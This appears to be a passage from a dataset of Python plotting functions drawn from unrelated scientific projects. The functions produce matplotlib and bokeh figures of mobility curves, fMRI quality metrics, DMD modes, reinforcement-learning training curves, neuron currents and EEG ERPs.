mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4)\n mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4)\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n meanE_1.append(utilities.mean_energy(chi_1_i,df))\n meanE_2.append(utilities.mean_energy(chi_2_i,df))\n meanE_3.append(utilities.mean_energy(chi_3_i,df))\n\n plt.figure(figsize=(2.05,2.5))\n # ax = plt.axes([0.2, 0.19, 0.75, 0.76])\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n mufac = 1000\n # mufac = 1000\n ax.plot(vcm, np.array(mu_3)/mufac, '-', linewidth=lw, label='Warm', color=warm_color)\n ax.plot(vcm, np.array(mu_2)/mufac, '--', linewidth=lw, label='Cold', color=cold_color)\n ax.plot(vcm, np.array(mu_1)/mufac, '--', linewidth=lw, label='RTA', color=rta_color)\n\n plt.xlim([0,np.max(fieldVector)/100])\n plt.xlabel(r'Electric field ($\\rm V \\, cm^{-1}$)')\n # plt.ylabel(r'$\\sigma^{\\omega = 0}_{\\parallel}$ ($\\rm cm^2 \\, kV^{-1}\\, s^{-1}$)')\n plt.ylabel(r'DC mobility (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n plt.ylim([0.8e4/mufac, 2e4/mufac])\n ax.locator_params(axis='x', nbins=6)\n # plt.legend(ncol=3,loc='lower center',frameon=False)\n plt.legend(frameon=False)\n plt.savefig(pp.figureLoc +'linear_mobility2.png',dpi=600)\n\n plt.figure()\n lw = 2\n plt.plot(vcm,(np.array(meanE_1) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='RTA')\n plt.plot(vcm,(np.array(meanE_2) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Cold '+r'$e^{-}$')\n plt.plot(vcm,(np.array(meanE_3) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Warm '+r'$e^{-}$')\n plt.xlabel(r'Electric field [$kV/cm$]')\n plt.ylabel(r'Mean Energy [meV]')\n plt.title(pp.title_str)\n plt.savefig(pp.figureLoc +'meanEnergy_vField.png', bbox_inches='tight',dpi=600)\n plt.legend(frameon=False)", "def fig_4():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig4.png'\n xx_plot(epoch, model, features, filters, figname)", "def plot_dmstep(self):\n\n x, y = self._calculate_snr_spread()\n\n # Attach a curve\n curve = Qwt.QwtPlotCurve()\n curve.attach(self)\n curve.setPen(Qt.QPen(Qt.Qt.blue, 2))\n curve.setData(x, y)\n \n self.replot()", "def grayplot_NH(QC,stage):\n\n\n #set some constants\n numpts=QC['GMtcs'].shape[1] #number of timepoints\n rightsignallim = np.arange(-20,21,20) #GS, main plot signal limits - 2% assuming mode 1000 normalization\n leftsignallim = np.arange(0,21,10) #DVars limits\n rylimz=[np.min(rightsignallim),np.max(rightsignallim)]\n lylimz=[np.min(leftsignallim),np.max(leftsignallim)]\n FDmult = 10 #multiplier to FD to get in range of DVars values\n FDthresh = 0.2 #FD threshold to mark frame for scrubbing (use 0.1 for filtered FD)\n\n #compute data quality metrics -- CG: compute by hand to better understand (separated here for practice)\n [mvm,ddt_mvm,FD] = compute_FD(QC['MVM'])\n DVars = compute_DVARS(QC['GMtcs'][:,:,stage]) # compute DVARs for a particular processing stage\n GS = compute_GS(QC['GMtcs'][:,:,stage]) # compute global signal for a particular processing stage\n\n #create plot\n fig = plt.figure(figsize=(10,10),constrained_layout = True)\n gs = GridSpec(9,1,figure=fig)\n\n #plot individual mvm params\n ax1 = 
fig.add_subplot(gs[0:2])\n pointindex = np.arange(1,numpts+1)\n plt.plot(pointindex,mvm)\n\n plt.xlim([0, numpts])\n plt.ylim([-1.5, 1.5])\n plt.ylabel('mvm-XYZPYR')\n\n #Next, plot FD, DVARS and GS on the same plot\n ax2a = fig.add_subplot(gs[2:4])\n ax2b = ax2a.twinx()\n ax2a.plot(pointindex,DVars,color=[0,0,1],alpha=0.5)\n ax2b.plot(pointindex,GS,color=[0,1,0],alpha=0.5)\n ax2a.plot(pointindex,FD*FDmult,color=[1,0,0],alpha=0.5)\n ax2a.hlines(FDthresh*FDmult,pointindex[0],pointindex[-1],'k',alpha=0.5)\n \n plt.xlim([0, numpts])\n ax2a.set_ylim(lylimz)\n ax2a.set_yticks(leftsignallim)\n ax2b.set_ylim(rylimz)\n ax2b.set_yticks(rightsignallim)\n ax2a.set_ylabel('R:FD*' + str(FDmult) +' B:DV G:GS')\n\n #next plot gray matter signal\n ax3 = fig.add_subplot(gs[4:8])\n new_GMtcs = QC['GMtcs'][:,:,stage]\n plt.imshow(new_GMtcs,cmap='gray',vmin=-20,vmax=20,aspect='auto') #default: showing 2% signal on mode 1000 norm\n plt.ylabel('GRAY')\n\n #finally, plot WM and CSF ts\n ax4 = fig.add_subplot(gs[8:])\n new_WMCSF = np.vstack((QC['WMtcs'][:,:,stage],QC['CSFtcs'][:,:,stage]))\n plt.imshow(new_WMCSF,cmap='gray',vmin=-20,vmax=20,aspect='auto')\n plt.ylabel('WM CSF')\n plt.xlabel('frames')\n\n return fig", "def plot(self):\n\t\tplot_chain(self.database_path, self.temp_folder)\n\t\tplot_density(self.database_path, self.temp_folder, self.cal_params)", "def plot_dmd(self):\n n_modes = 10\n U = self.uf\n # put the decomposition axis last\n UT = U.transpose(0, 2, 1)\n # create the matrix of snapshots by flattening the non\n # decomp axes so we have a 2d array where we index the\n # decomp axis like snapshots[:,i]\n snapshots = UT.reshape((-1, UT.shape[-1]))\n\n # remove nans\n # TODO: remove nans by interpolation earlier on\n snapshots[np.where(np.isnan(snapshots))] = 0\n\n modes, ritz_values, norms \\\n = mr.compute_DMD_matrices_snaps_method(snapshots, range(n_modes))\n\n # as array, reshape to data dims\n reshaped_modes = modes.A.T.reshape((-1,) + UT.shape[:-1])\n\n fig, ax = plt.subplots(nrows=3)\n c0 = self.mean_velocity_Uf(ax[0])\n\n ax[1].set_title('First mode of DMD')\n ax[1].set_xlabel('time after front passage')\n ax[1].set_ylabel('height')\n c1 = ax[1].contourf(reshaped_modes[0], 100)\n\n ax[2].set_title('Second mode of DMD')\n ax[2].set_xlabel('time after front passage')\n ax[2].set_ylabel('height')\n # TODO: why does reshaped_modes seem to have a list of\n # duplicates?\n # Seems to be complex conjugates - why is this??\n c2 = ax[2].contourf(reshaped_modes[2], 100, levels=c1.levels)\n\n fig.colorbar(c0, ax=ax[0], use_gridspec=True)\n fig.colorbar(c1, ax=ax[1], use_gridspec=True)\n fig.colorbar(c2, ax=ax[2], use_gridspec=True)\n\n fig.tight_layout()\n\n return fig", "def dk_plotting():\n heatmap_mode1_error_x(make_heatmap=False, make_panel=True)\n\n #heatmap_mode1_error_x()\n figure_2_combined_cross_sections()\n\n #heatmap_combined_error_c()\n #heatmap_combined_error_koff()\n #heatmap_kpr_error_c()\n #heatmap_kpr_error_koff()\n\n #heatmap_kpr2_error_c()\n #heatmap_kpr2_error_koff()\n\n ctildePosterior = [truncate(f, 3) for f in list(np.arange(0.0 * KON / KP, 5.0 * KON / KP + 0.005, 0.005))[1:]]\n kofftildePosterior = [truncate(f, 2) for f in list(np.arange(0.0 / KP, 50.0 / KP + 0.05, 0.05))[1:]]\n\n #heatmap_figure_4()\n\n return 0", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = 
h5py.File(fin,'r')\n    g = Fin[fd('vanHove',comp[0])]\n\n    temp = g.attrs['temperature']\n    dtime = g.attrs['dtime']\n\n\n    # istatus = plots.non_i_plot_start()\n    \n    fig = mplt.figure()\n    fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n    dims = figure_out_grid(steps)\n    \n    plt_count = 1\n    outs = []\n    tmps = []\n    for j in range(start,start+step_size*steps, step_size):\n        (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n        if len(count) < 50:\n            plt_count += 1\n            continue\n        #count = count/np.sum(count)\n        \n        sp_arg = dims +(plt_count,)\n        ax = fig.add_subplot(*sp_arg)\n        ax.grid(True)\n\n        \n        alpha = _alpha2(edges,count)\n        \n        ax.set_ylabel(r'$\\log{P(N)}$')\n        ax.step(edges,np.log((count/np.sum(count))),lw=2)\n        ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n        ax.set_xlim(x_lim)\n        plt_count += 1\n\n    mplt.draw()\n\n    # plots.non_i_plot_start(istatus)\n\n    del g\n    Fin.close()\n    del Fin", "def _plot(self, rewards, losses, epsilons):\n        plt.figure(figsize=(20,5))\n        plt.subplot(131)\n        plt.title('Episodic Reward')\n        plt.plot(rewards)\n        plt.subplot(132)\n        plt.title('TD Loss')\n        plt.plot(losses)\n        plt.subplot(133)\n        plt.title('Epsilon')\n        plt.plot(epsilons)\n        plt.tight_layout()\n        plt.show()", "def plot_pade_figure(self):\n        data_analysis = DatabaseData(dataframe=self.plot_data)\n        print (data_analysis.dataframe.columns)\n        data_analysis.run_pade_through_R(rscript='birch',get_inits_ev=True)\n        data_analysis.create_precisions()\n        data_analysis.extract_pade_curve()\n        x_eos_kpts, y_eos, xs_err, ys_err, x_pade_kpts, y_pade = \\\n        data_analysis.create_pade_bokeh_compat(properties=self.properties)\n        print (type(self.properties), self.properties)\n        if self.properties == 'B':\n            ext = data_analysis.Bp\n            print ('HERE AT PROPERTIES', ext, type(ext))\n        elif self.properties == 'BP':\n            ext = data_analysis.BPp\n        elif self.properties == 'E0':\n            ext = data_analysis.E0p\n        elif self.properties == 'V0':\n            ext = data_analysis.V0p\n        p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n           x_axis_type=\"log\", x_axis_label='K-points per atom', title='Pade Extrapolate of {0} is {1}'.format(self.properties, str(ext)) )\n        p.xaxis.axis_label = 'K-points per atom'\n        p.line(x_pade_kpts, y_pade, color='red')\n        p.circle(x_eos_kpts, y_eos,color='blue',size=5, line_alpha=0)\n        p.multi_line(xs_err, ys_err, color='black')\n        if self.properties == 'B':\n            p.yaxis.axis_label = 'Bulk Modulus B (GPa)'\n        elif self.properties == 'dB':\n            p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative'\n        elif self.properties == 'E0':\n            p.yaxis.axis_label = 'DFT Energy (eV/atom)'\n        elif self.properties == 'V0':\n            p.yaxis.axis_label = 'Volume (A^3/atom)'\n\n        return p", "def plot_ps(self, show=False, density=True, pcolor=\"r\", mcolor=\"b\", lw=0.6):\n\n        if (density):\n            \"\"\" also read the local overdensity value and plot line colors according to\n            the density value, + = red, - = blue; adjust alpha accordingly\n            \"\"\"\n            if len(self.ds)<self.Nsubs:\n                print (\"no density data\")\n                return 0\n            ads=np.abs(self.ds)\n            meands=np.mean(self.ds)\n            mads=np.max(ads)\n            normds=np.array([ads[i]/mads/1.5 for i in range(len(ads))])\n            self.normds=normds\n\n        for sub in range(self.Nsubs):\n            #print sub\n            if not(density):\n                self.plt.plot(self.klist, self.pfactor*self.powerspectra[sub])\n            else:\n                if self.ds[sub]>meands:\n                    self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=pcolor, alpha=normds[sub], linewidth=lw)\n                else:\n                    
self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=mcolor, alpha=normds[sub], linewidth=lw)\n #self.plt.xlim(self.klist[1], 0.1)\n #if (self.normalized):\n # self.plt.ylim(0.0,2)\n #else:\n # self.plt.ylim(500, 50000)\n # self.plt.yscale('log')\n\n self.plt.xlabel(r\"$k {\\rm (h/Mpc)}$\")\n if (self.normalized):\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)/ P_{\\rm avg}(k)$\")\n self.plt.yscale('linear')\n else:\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)\\; {\\rm (Mpc/h)}^3$\")\n self.plt.yscale('log')\n\n if (show):\n self.plt.show()", "def plot_decompose(self):\n try:\n assert self._arr_seasonal is not None\n except AssertionError:\n self.ts_decompose()\n\n fig, axes = plt.subplots(5, 1, figsize=(20, 9), sharex=True)\n axes[0].plot(self._res_decomp.observed)\n axes[0].set_ylabel(\"Original\")\n #\n axes[1].plot(self._arr_trend)\n axes[1].set_ylabel(\"Trend\")\n #\n axes[2].plot(self._arr_seasonal)\n axes[2].set_ylabel(\"Seasonal\")\n #\n axes[3].plot(self._arr_baseline)\n axes[3].set_ylabel(\"Baseline\")\n #\n axes[4].plot(self.residuals)\n axes[4].set_ylabel(\"Residuals\")\n #\n if self.upper_whisker_res is not None:\n axes[4].axhline(y=self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n axes[4].axhline(y=-self.upper_whisker_res,\n xmin=0,\n xmax=1, color='m',\n label='upper_whisker',\n linestyle='--', linewidth=1.5)\n\n plt.gcf().autofmt_xdate()\n plt.grid(True)\n plt.show()", "def plot_tsnes():\n # Two environments (for main paper figure. All for final figure)\n ENVS = [\n \"BipedalWalker-v3\",\n #\"LunarLander-v2\",\n #\"Pendulum-v0\"\n \"Acrobot-v1\",\n #\"CartPole-v1\"\n ]\n ALGO_TYPES = [\n \"stablebaselines\",\n \"stablebaselines\",\n \"wann\",\n \"wann\",\n ]\n ALGO_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMAES\",\n ]\n ALGO_PRETTY_NAMES = [\n \"A2C\",\n \"PPO\",\n \"NEAT\",\n \"CMA-ES\"\n ]\n\n REWARD_SCALES = {\n \"Pendulum-v0\": [-1600, -200],\n \"Acrobot-v1\": [-500, -100],\n \"LunarLander-v2\": [-230, 200],\n \"BipedalWalker-v3\": [-100, 300],\n \"CartPole-v1\": [0, 500]\n }\n\n figure, axs = pyplot.subplots(\n figsize=[6.4 * 2, 4.8],\n nrows=2,\n ncols=4,\n gridspec_kw={'hspace': 0, 'wspace': 0},\n )\n\n for plot_i in range(2):\n env = ENVS[plot_i]\n reward_scale = REWARD_SCALES[env]\n for algo_i in range(len(ALGO_TYPES)):\n column_idx = (algo_i % 2) + plot_i * 2\n row_idx = 0 if algo_i <= 1 else 1\n ax = axs[row_idx, column_idx]\n algo_type = ALGO_TYPES[algo_i]\n algo_name = ALGO_NAMES[algo_i]\n algo_pretty_name = ALGO_PRETTY_NAMES[algo_i]\n\n experiment_glob = \"experiments/{}_{}_{}_*\".format(algo_type, env, algo_name)\n experiment_paths = glob(experiment_glob)\n tsnes = []\n rewards = []\n for experiment_path in experiment_paths:\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n population_tsnes = []\n population_rewards = []\n for path in pivector_paths:\n data = np.load(path)\n population_tsnes.append(data[\"tsne\"])\n population_rewards.append(data[\"average_episodic_reward\"])\n data.close()\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n tsnes = np.concatenate(tsnes, axis=0)\n rewards = np.concatenate(rewards, axis=0)\n\n # Min-max normalization\n rewards = (rewards - reward_scale[0]) / (reward_scale[1] - reward_scale[0])\n\n scatter = ax.scatter(\n tsnes[:, 0],\n tsnes[:, 1],\n c=rewards,\n cmap=\"plasma\",\n s=1,\n vmin=0,\n vmax=1\n )\n\n ax.text(0.98, 0.98, algo_pretty_name, horizontalalignment=\"right\", 
verticalalignment=\"top\", transform=ax.transAxes)\n ax.set_xticks([])\n ax.set_yticks([])\n # Hide spines, the outer edges\n ax.spines[\"top\"].set_alpha(0.2)\n ax.spines[\"bottom\"].set_alpha(0.2)\n ax.spines[\"left\"].set_alpha(0.2)\n ax.spines[\"right\"].set_alpha(0.2)\n # Hide edge spines and bolden mid-spines\n if row_idx == 0:\n ax.spines[\"top\"].set_visible(False)\n else:\n ax.spines[\"bottom\"].set_visible(False)\n if column_idx == 0:\n ax.spines[\"left\"].set_visible(False)\n elif column_idx == 1:\n ax.spines[\"right\"].set_alpha(1.0)\n elif column_idx == 2:\n ax.spines[\"left\"].set_alpha(1.0)\n elif column_idx == 3:\n ax.spines[\"right\"].set_visible(False)\n\n # Add titles\n if row_idx == 0 and (column_idx == 0 or column_idx == 2):\n ax.set_title(env.split(\"-\")[0], x=1.0)\n\n cbaxes = figure.add_axes([0.4, 0.94, 0.2, 0.02])\n cbar = figure.colorbar(scatter, orientation=\"horizontal\", cax=cbaxes)\n cbar.set_ticks([0.0, 0.5, 1.0])\n cbar.set_ticklabels([\"Min\", \"Reward\", \"Max\"])\n cbar.ax.xaxis.set_ticks_position('top')\n cbar.ax.xaxis.set_label_position('top')\n cbar.ax.tick_params(labelsize=\"small\", length=0)\n figure.tight_layout()\n figure.savefig(\"figures/tsnes.png\", dpi=200, bbox_inches=\"tight\", pad_inches=0.0)", "def compare_averages_shell_pspec_dft():\n\n select_radius = 5. #degrees\n\n Nside=256\n Npix = 12 * Nside**2\n Omega = 4*np.pi/float(Npix)\n\n Nfreq = 100\n freqs = np.linspace(167.0, 177.0, Nfreq)\n dnu = np.diff(freqs)[0]\n Z = 1420/freqs - 1.\n\n sig = 2.0\n mu = 0.0\n shell = np.random.normal(mu, sig, (Npix, Nfreq))\n\n dV = comoving_voxel_volume(Z[Nfreq/2], dnu, Omega)\n variances = []\n means = []\n pks = []\n\n gs = gridspec.GridSpec(2, 3)\n fig = pl.figure()\n\n ax0 = pl.subplot(gs[0, 0:2])\n ax1 = pl.subplot(gs[1, 0])\n ax3 = pl.subplot(gs[1, 1])\n ax2 = pl.subplot(gs[:, 2])\n\n steps = range(10,110,10)\n vmin,vmax = min(steps),max(steps)\n normalize = mcolors.Normalize(vmin=vmin, vmax=vmax)\n colormap = cm.viridis\n\n for n in steps:\n Nkbins = 100\n kbins, pk = pspec_funcs.shell_project_pspec(shell, Nside, select_radius, freqs=freqs, Nkbins=Nkbins, N_sections=n, cosmo=True, method='dft', error=False)\n variances.append(np.var(pk[0:Nkbins-5]))\n means.append(np.mean(pk[0:Nkbins-5]))\n pks.append(pk)\n ax0.plot(kbins, pk, label=str(n), color=colormap(normalize(n)))\n\n ax0.axhline(y=dV*sig**2, color='k', lw=2.0)\n# ax0.legend()\n scalarmappable = cm.ScalarMappable(norm=normalize, cmap=colormap)\n scalarmappable.set_array(steps)\n fig.colorbar(scalarmappable,label=r'Number of snapshots', ax=ax0)\n ax0.set_ylabel(r\"P(k) [mK$^2$ Mpc$^{3}]$\")\n ax0.set_xlabel(r\"k [Mpc$^{-1}]$\")\n ax1.plot(steps, np.array(variances), label=\"Variance\")\n ax1.set_ylabel(r\"Variance(P(k)) [mK$^4$ Mpc$^{6}]$\")\n ax1.set_xlabel(u\"Number of 5° snapshots\")\n ax3.plot(steps, means, label=\"Mean\")\n ax3.set_ylabel(r\"Mean(P(k)) [mK$^2$ Mpc$^{3}]$\")\n ax3.set_xlabel(u\"Number of 5° snapshots\")\n ax1.legend()\n ax3.legend()\n im = ax2.imshow(np.array(pks)[:,0:Nkbins-5], aspect='auto')#, norm=mcolors.LogNorm())\n fig.colorbar(im, ax=ax2)\n print('Fractional deviation: ', np.mean(np.abs(pk - dV*sig**2)))\n pl.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n 
os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def _kde_example(data):\n # Plot the data\n ch = chartify.Chart(blank_labels=True, y_axis_type=\"density\")\n ch.set_title(\"KDE plot\")\n ch.plot.kde(data_frame=data, values_column=\"unit_price\", color_column=\"fruit\")\n ch.show(_OUTPUT_FORMAT)", "def test_lightcurve_seismology_plot():\n KeplerLightCurveFile(TABBY_Q8).PDCSAP_FLUX.periodogram().plot()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", 
delimiter=\" \", header=None) # Load the XPP simulation\n\n plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def 
plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n 